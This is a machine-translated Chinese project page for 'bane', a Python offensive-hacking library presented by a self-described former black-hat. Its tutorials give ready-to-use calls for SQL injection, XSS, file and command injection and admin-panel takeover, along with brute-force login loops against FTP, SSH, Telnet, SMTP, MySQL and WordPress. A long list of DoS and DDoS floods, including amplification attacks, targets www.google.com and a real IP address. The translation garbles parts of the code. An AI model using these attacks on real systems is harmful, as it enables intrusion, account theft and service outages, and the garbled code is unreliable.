网络安全库
banelib的Python项目详细描述
"哦,你认为黑暗是你的盟友。但你只是领养了黑暗;我是在黑暗中出生的,被黑暗所塑造。直到我已经是一个男人,我才看到光明,那时对我来说,一切都是盲目的!影子背叛了你,因为它们属于我!"-贝恩(黑暗骑士)
.///` `.--::::::---.`` `///.
h-.-s+++/--<br>.---/+o++s:.-h
++..-. `:../s
-+ydm-..: :..-dmho:`
:odmNNNNs..-. `:..+MNNNmmy/. `
.odmNNNNMMMN`..: -..`mMMMMNNNNmy:
+mNNNNMMMMMMMo`.:` :``/MMMMMMMMNNNmy.
.yNNNNMMMMMMMMMd` `-<br>```````..-` `yMMMMMMMMMMNNNd:
-dNNNMMMMMMMMMMMN` ..-` `-`- mMMMMMMMMMMMMNNmo
:mNNNMMMMMMMMMMMMM: . `.` -MMMMMMMMMMMMMMNNNs`
/mNNNMMMMMMMMMMMMMMy --- .-- oMMMMMMMMMMMMMMMNNNy`
:mNNNMMMMMMMMMMMMMMMN```:.````````.:```dMMMMMMMMMMMMMMMMNNNy`
-mNNNNMMMMMMMMMMMMMMMMo`.-` `-.`+MMMMMMMMMMMMMMMMMNNNNo
hNNNNNMMMMMMMMMMMMMMMMm.``- .``.dMMMMMMMMMMMMMMMMMMNNNm-
-NNNNNMMMMMMMMMMMMMMMMMM-..: -<br>NMMMMMMMMMMMMMMMMMMNNNNs
oNNNNNMMMMMMMMMMMMMMMMMMo``.` -` +MMMMMMMMMMMMMMMMMMMNNNNm
:dNNNNNNMMMMMMMMMMMMMMMMMd<br>-``````<br>.hMMMMMMMMMMMMMMMMMMMNNNNNs.
.ssmNNNNNNMMMMMMMMMMMMMMMMMM.``/:. .-/```NMMMMMMMMMMMMMMMMMMNNNNNNyy+` `
`oy: mNNNNNNMMMMMMMMMMMMMMMMMM/``-` `-``:MMMMMMMMMMMMMMMMMMMNNNNNN/`+y: `
+y` dNNNNNNMMMMMMMMMMMMMMMMMMy..-:- --:..oMMMMMMMMMMMMMMMMMMMNNNNNN: -N`
m- hNNNNNNMMMNdhhyyhddmMMMMMd```:.``.:```hMMMMNdhso++++shmNMMMNNNNN: yo `
/d yNNNNNMMh/-````````.-/ydNM.``- -```NNds:.`..-----..-sNMMNNNNN- -m`
h+ sNNNNNMMmsyhddmmmdhs:` `-o/../` `/-.:+-` `:yhddmNNNNmmNMMMNNNNN. d/
m/ oNNNNNMMMMMMMNdyssoooo:` `:..``.+```.-. :o++//+yydMMMMMMMMNNNNN` .so
d-- /NNNNNNMMMMMmyhm// ymy.`- o `- odm:- .ddssNMMMMMNNNNNm /:s
.h / :NNNNNNNMMMmhshhy+++ohy/. .: `o` `/``-shysssyddddNMMMMNNNNNNd --.h
-y `: .NNNNNNNMMMMMMMMNNmmmhys/:.`..``.``..`-:syhhdmNNMMMMMMMMMMNNNNNy / `d
:s :` dNNNNNMMMMMMMMMNNNmmNNh- `.` `.` `+mMNNNNNMMMMMMMMMMNNNNN+ :` m `
/o /` oNNNNMMMMMMMMMMMMMMmd+.. `.:- -` - -:.. -sddmNMMMMMMMMMMMMNNNm. .: m `
++ `:``dNNNMMMMMMMMMMMNo+/.`./-. o` --` o `-/.``/+omMMMMMMMMMMNNNo .: d` `
-h `:`:mNNMMMMMMMMMMd-.+.+--:.`.+.-.::.-./-`.:--/:+..hMMMMMMMMMNNh`.: -h `
s: `:`+mNMMMMMMMMMm- `/:` o/://++:++++:+/+/:/o``:+` .mMMMMMMMMNd..: y-
.h `:`/hNMMMMMMd+: -::<br>s-:+`.+:+-.+:+:`/:-+:-.-:- :NMMMMMMNy.-- :y
o/ ` `:``:ymMNh:`- /:-+`o::/` +:/. +:+` /::o./--+ /omMNdo- -- ` h.
`d` `+.` :.` -s: -` ./:::`/::/ +-/. +-+` :::/`-:::- `-`++.``-. `-+ :s
o+ /`-:``.-. `- /--/ /:-: +-/. +-+ :-:+ /--/ .. `--. .:..: h.
`d` :` +h+. - `+-:: .+-:+..-+://-+:+-../:-+-`-:-/. -` -yd. / /s
o+ `:. -ydo. -` //::..o/-:o:.//:/++/:/+.:+/-/+: /::o : :yd+``-- d.
`d .:. -sy .. .o--+ -.+-.`.-/<br>:/<br>/--`.-+.: +--o- `/d+``--`:s
s/ .:` :.:```-o--o.-.:-` `:/ .: /:` `-/ / s:-o-```+``.-` h.
.h -:`/.///`/..`:-.:`<br> <br><br><br>. <br>`: /--../ //:o.:.-y
s: -o/::/:--.-.-.: : /`:.---/::+. y-
`h. ``/. `/ ` -.:``` <br><br>..` ```: / ` :` ./. +o
.y. -.-- -.:.``- -```::```: ..`./ : .-.-` /s
.y- -.:```: :/::o+/::/ : ``: : `+o
`s+` -..- -.o/:/: `+::+//:+. -/::o`: ..`-` .s/
:s- ./- `- -.o//o. /:::-::+ `o//o : -` ./.`+o.
`/o:+..+`.` -.://+<br>+--//:-+<br>////`: `../-.ss-
/h /` ..-` .-o/+:..+--//:-+..-o/+:.` `-.- `+ y-
o+``.-+-.::<br>o//o- /--::--+ .o//s<br>:/.-//:``:s
-o:```.//: :+::+.o--oo:-o.+::+/ :/o.```:o:
-o++oy.: .- /`o::oo:-+-/ -- /o++++o:
`os .. /..//../ ..` `s:
`o+. `:`:-.-. `.++-
`/+/.` `. .` `-++:`
`:+++/:-<br>-:+++/-
`.-::--`
`
INTRODUCTION:
此python库仅用于教育目的。作为创建者和开发人员,我不对在任何恶意活动中对该模块的任何误用负责。它是用来理解黑客如何创建他们的工具并执行他们的攻击的工具。它包含了大多数已知的攻击和攻击。它可用于执行:DoS和DDoS攻击(包括所有已知的工具)、信息收集、取消代理、爬网、Google Dorking、检查漏洞(SQL注入(所有类型)、XSS、命令执行、PHP代码注入、FI、强制浏览等)
SPECIAL SPEECH:
这是献给我的导师:Zachary Barker(https://www.facebook.com/zachary.barker.5439),他是我在黑客世界和黑客团体的旅程中的领导者和老师,我们一起经历了很多,当我还是一名活跃的成员时,我们在很多行动中都在场。在黑帽子社区,但现在他死在一个肇事逃逸:(。他是我真正的网络兄弟之一:
-s0u1(https://www.facebook.com/s0u1.hlotw" rel="nofollow">https://www.facebook.com/s0u1.hlotw):程序员和黑帽子。
-文斯(https://www.facebook.com/vince linux" rel="nofollow">https://www.facebook.com/vincelinux):Linux和硬件专家、社会工程师和程序员。
-zachary barker(lulz zombie):团队领导、Anarkist、Ops Organizer、Progammer、网络安全专家和Blackhat。
-lulztigre(https://www.twitter.com/lulztigre" rel="nofollow">https://www.twitter.com/lulztigre):缺陷赏金猎人、渗透测试人员和python程序员。
-詹希尔。
为了纪念我所有的兄弟和我的兄弟扎克,我第一次与公众分享了我所有的个人黑客工具。请明智地使用它:)
现在让我们开始一些教程,好吗?
TUTORIALS:
i-安装库并导入:
您可以使用pip来执行此操作:
pip安装bane
或者您可以克隆项目的链接,然后运行setup.py
Git克隆https://github.com/alabouali/bane
溴化镉
python setup.py安装
要导入,只需执行以下操作:
导入危害
注意:
-对于Windows用户,您不能使用:bane.ssh1()和bane.telnet1(),因为它们依赖于pexpect,需要expect包才能工作,而expect包不能安装在Windows上
-termux的用户不能使用这个库,因为有些模块不能安装,所以它没有意义:(
ii-用法:
这个模块有许多令人难以置信的、有用的和易于使用的功能,可以在任何与web应用程序的安全性相关的项目中实现。
漏洞:
默认参数:
logs=true(在屏幕上打印测试结果,设置为false不显示)。
返回=false(返回一个值,指示测试的成功(1/true)或失败(0/false)。
超时:超时值。
代理:与在请求中使用"代理"参数的方式相同。
1-sql-injection:
(有用链接:https://www.acuteix.com/websitesecury/sql-injection2/)
让我们从一个简单的sql注入测试开始。有一些技术可以告诉我们Web应用程序是否易受SQL注入攻击,有:
-基于错误。
-基于布尔值。
-基于时间。
在这里,我们有一些函数可以使用上述技术确定web应用程序是否容易受到sql注入的攻击S.P/P>
bane.sqlieb('http://example.com/index.php?id=5')测试基于错误的sqli
bane.sqlitb('http://example.com/index.php?id=5')测试基于时间的sqli
bane.sqlibb('http://example.com/index.php?id=5')测试基于布尔值的sqli
t 嘿,只返回2个可能的结果:
false:目标不易受攻击。
正确:目标易受攻击。
2-xss:
(有用链接:https://www.acuteix.com/vulnerabilities/web/cross-site-scripting/)
跨站点脚本(xss)是指客户端代码注入攻击,攻击者可以在合法网站或web应用程序中执行恶意脚本。当Web应用程序在其生成的输出中使用未验证或未编码的用户输入时,就会发生XSS。
这里我们有一个函数来获取任何网页中的所有html输入,并使用get和post两种方法逐一测试每个输入以抵御此攻击。
bane.xss('https://xss game.appspot.com/level1/frame')
输出:
获取参数
测试已开始
有效载荷:
参数:查询方法:get=>;[+]找到有效负载
参数:查询方法:post=>;[-]未找到有效负载
如果您没有将"payload"参数(默认设置为:none)修改为任何xss payload,则会使用默认的payload。您可以设置differnet xss payload,以便每次都可以使用代理进行测试。
< BR> 还有另一个函数要测试:
bane.xssget('http://example.com/index.php',{parameter:xss payload here})
bane.xsspost(http://example.com/index.php,%7bparameter" rel="nofollow">http://example.com/index.php,{parameter:xss payload here})
3-fi:
(文件包含):(有用链接:https://www.acuteix.com/vulnerabilities/web/file inclusion/)
如果Web应用程序易受FI攻击,则可以使用此功能对其进行测试:
bane.fi('http://example.com/index.php?file=page1.php')
它返回(如果参数"returning"设置为:true)包含
{"status":如果成功或失败,则status=>;true
,
"nullbyte":如果"nullbyte"参数设置为true,则为nullbyte
,"link":r.url==>;结果url}
4-php代码注入:
(有用链接:https://www.acuteix.com/vulnerabilities/web/php-code-injection/)
要针对php代码注入测试web应用程序,我们可以使用以下函数:
bane.injectLink('http://example.com/index.php?id=2')
如果返回:
错误:不易受攻击
正确:易受攻击
您也可以使用其他函数来执行此操作:
bane.getinject('http://example.com/index.php",param=parameter here)
bane.postinject('http://example.com/index.php',param=parameter here)
5命令注入:
(有用链接:https://www.owasp.org/index.php/testing_for_command_injection(otg-inpval-013))
os命令注入是一种通过web界面在web服务器上执行os命令的技术。用户通过web界面提供操作系统命令以执行os命令。任何未正确清理的Web界面都会受到此攻击。通过执行操作系统命令,用户可以上传恶意程序,甚至获取密码。当在应用程序的设计和开发过程中强调安全性时,可以防止操作系统命令注入。
在这里,我们可以使用这些函数来测试web应用程序是否存在此类漏洞:
bane.execlink('http://example.com/index.php?doc=1')
bane.getexec('http://example.com/index.php',param=your_parameter_here)
bane.postexec('http://example.com/index.php',param=your_parameter_here)
5-强制浏览:
(有用链接:https://www.owasp.org/index.php/forced\u browsing)
强制浏览是一种攻击,其目的是枚举和访问应用程序未引用但仍可访问的资源。
攻击者可以使用暴力技术在域目录中搜索未链接的内容,例如临时目录和文件,以及旧的备份和配置文件。这些资源可能存储有关Web应用程序和操作系统的敏感信息,如源代码、凭据、内部网络寻址等,因此被认为是入侵者的宝贵资源。
当应用程序索引目录和页基于数字生成或可预测的值时,或使用自动工具处理常用文件和目录名时,会手动执行此攻击。
此攻击也称为可预测的资源位置、文件枚举、目录枚举和资源枚举。
管理面板:
我们可以使用此方法访问和枚举一些或所有内部管理面板页面,并接管面板!!!!< < > >
强制浏览(http://example.com/admin/" rel="nofollow">http://example.com/admin/",ext="php",timeout=10)
或
bane.forcebrowsing('http://example.com/admin/',ext="asp")
您还可以使用此处的功能查找站点的管理登录面板:
bane.adminpanel('http://example.com/admin/',ext="php",timeout=7)
默认扩展名是"php",您可以随意更改它:as p,aspx
使用参数"ext"。
文件管理器:
我们可以使用以下技术强制找到可能的文件管理器的路径并接管它:
bane.filemanager('http://example.com')
6-慢速拒绝服务漏洞:
(有用链接:https://www.cloudflare.com/learning/ddos/ddos-low-and-slow-attack/)高超时值:
bane.timeouttest('www.google.com',port=443)
慢速获取攻击测试:
bane.slowgetest('www.google.com',port=80)
慢速攻击后测试:
bane.slowposttest('www.google.com',port=80)
慢读攻击测试:
bane.slowredtest('www.google.com',port=80)
每个IP测试的连接数:
bane.connectionslimit('www.google.com',端口=80)
7-bruteforce攻击:
(有用链接:https://www.acuteix.com/vulnerabilities/web/login-page-password-guessing-attack/" rel="nofollow">https://www.acuteix.com/vulnerabilities/web/login-page-password-guessing-attack/)
在这里,我们使用用户名和密码列表对目标执行bruteforce附加,如果loin函数返回true,则登录失败。
资金转移定价:
单词列表=["admin:admin","admin:12345","root:root"]
对于单词列表中的x:
用户=x.split(":")[0]
pwd=x.split(":")[1]
打印"[*]正在尝试:",用户,pwd
如果bane.ftp("example.com",username=user,password=pwd)==true:
打印"[+]找到"
中断
< BR>
打印"[-]失败"
ssh:
这里有两种登录ssh服务器的方法:
ssh1:
(使用带有"spawn"的pexpect模块,而不是更具解理性的"pexsh")
单词列表=["admin:admin","admin:12345","root:root"]
对于单词列表中的x:
用户=x.split(":")[0]
pwd=x.split(":")[1]
打印"[*]正在尝试:",用户,pwd
如果bane.ssh1("example.com",username=user,password=pwd)==true:
打印"[+]找到"
中断
< BR>
打印"[-]失败"
ssh2:
(使用paramiko模块)
单词列表=["admin:admin","admin:12345","root:root"]
对于单词列表中的x:
用户=x.split(":")[0]
pwd=x.split(":")[1]
打印"[*]正在尝试:",用户,pwd
如果bane.ssh2("example.com",username=user,password=pwd)==true:
打印"[+]找到"
中断
< BR>
打印"[-]失败"
电话网:
这里有两种登录telnet服务器的方法:
telnet1:
(使用带有"spawn"的pexpect模块,而不是使用更为劈开的"pexsh")
单词列表=["admin:admin","admin:12345","root:root"]
对于单词列表中的x:
用户=x.split(":")[0]
pwd=x.split(":")[1]
打印"[*]正在尝试:",用户,pwd
如果bane.telnet1("example.com",username=user,password=pwd)==true:
打印"[+]找到"
中断
< BR>
打印"[-]失败"
telnet2:
(使用telnetlib模块)
单词列表=["admin:admin","admin:12345","root:root"]
对于单词列表中的x:
用户=x.split(":")[0]
pwd=x.split(":")[1]
打印"[*]正在尝试:",用户,pwd
如果bane.telnet2("example.com",username=user,password=pwd)==true:
打印"[+]找到"
中断
< BR>
打印"[-]失败"
smtp:
单词列表=["admin:admin","admin:12345","root:root"]
对于单词列表中的x:
用户=x.split(":")[0]
pwd=x.split(":")[1]
打印"[*]正在尝试:",用户,pwd
如果bane.smtp("example.com",username=user,password=pwd)==true:
打印"[+]找到"
中断
< BR>
打印"[-]失败"
MySQL:
单词列表=["admin:admin","admin:12345","root:root"]
对于单词列表中的x:
用户=x.split(":")[0]
pwd=x.split(":")[1]
打印"[*]正在尝试:",用户,pwd
如果bane.mysql("example.com",username=user,password=pwd)==true:
打印"[+]找到"
中断
< BR>
打印"[-]失败"
管理员登录:
单词列表=["admin:admin","admin:12345","root:root"]
对于单词列表中的x:
用户=x.split(":")[0]
pwd=x.split(":")[1]
打印"[*]正在尝试:",用户,pwd
如果bane.admin login(http://example.com/admin/login.php,{'username':用户,'password':pwd)==true:
打印"[+]找到"
中断
< BR>
打印"[-]失败"
wordpress管理员登录:
单词列表=["admin:admin","admin:12345","root:root"]
对于单词列表中的x:
用户=x.split(":")[0]
pwd=x.split(":")[1]
打印"[*]正在尝试:",用户随钻测井
如果bane.wpadmin(http://example.com/",username=user,password=pwd)==true:
打印"[+]找到"
中断
< BR>
打印"[-]失败"
液压工具:
hydra是一种著名的工具,广泛用于暴力攻击。以下是基于上述函数的python版本。
需要以下参数:
proto:默认设置为"ssh",可以设置为:"ftp"、"ssh"、"telnet"、"smtp"、"mysql"、"wp"(在http协议上强制wp站点)
p:目标端口,默认设置为:22
wl:列表包含用户名和密码,用":"分隔,例如:["admin:admin"、"admin:12345"、"root:root"]
单词列表=["admin:admin","admin:12345","root:root"]
bane.hydra("127.0.0.1",proto="telnet",p=23,wl=wordlist)
拒绝服务/拒绝服务:
(有用链接:https://en.wikipedia.org/wiki/denial-of-service_attack)
bane.hulk('www.google.com',threads=1000)hulk攻击
bane.proxhulk('www.google.com',threads=1000)使用http代理的hulk攻击
bane.slowloris('www.google.com',p=80,threads=50)slowloris攻击
bane.xerxes('www.google.com',p=443,threads=500)xerxes攻击
bane.http flood('www.google.com',p=80,threads=1000)http洪水
bane.lulzer('www.google.com',p=80,threads=1000)http代理泛滥
bane.tcp flood('www.google.com',threads=1000)TCP洪水
bane.udp('50.63.33.34',p=80)udp洪水
bane.doser(https://www.google.com,threads=500" rel="nofollow">https://www.google.com,threads=500)
bane.proxdoser(https://www.google.com,threads=500" rel="nofollow">https://www.google.com,threads=500)
bane.torshammer('www.google.com',p=80,threads=1000)
bane.sloread('www.google.com',p=80,threads=1000)
bane.apachekiller('www.google.com',p=80,threads=500)
bane.goldeneye('www.google.com',p=80,threads=1000)
bane.medusa('www.google.com',p=80,threads=1000)
bane.icmp('50.63.33.34',p=80,线程=100)
bane.synflood('50.63.33.34',p=80,线程=100)
bane.icmpstorm('50.63.33.34',p=80,线程=100)
贝恩兰德('50.63.33.34',p=80,线程=100)
bane.udpstorm('50.63.33.34',p=80,线程=100)
bane.blacknurse('50.63.33.34',p=80,线程=100)
bane.dnsamplif('50.63.33.34',p=80,dns list=[此处列出您的dns服务器],线程=100)
bane.ntpamplif('50.63.33.34',p=80,dnslist=[此处列出您的NTP服务器],线程=100)
bane.snmpamplif('50.63.33.34',p=80,dnslist=[此处列出您的SNMP服务器],线程=100)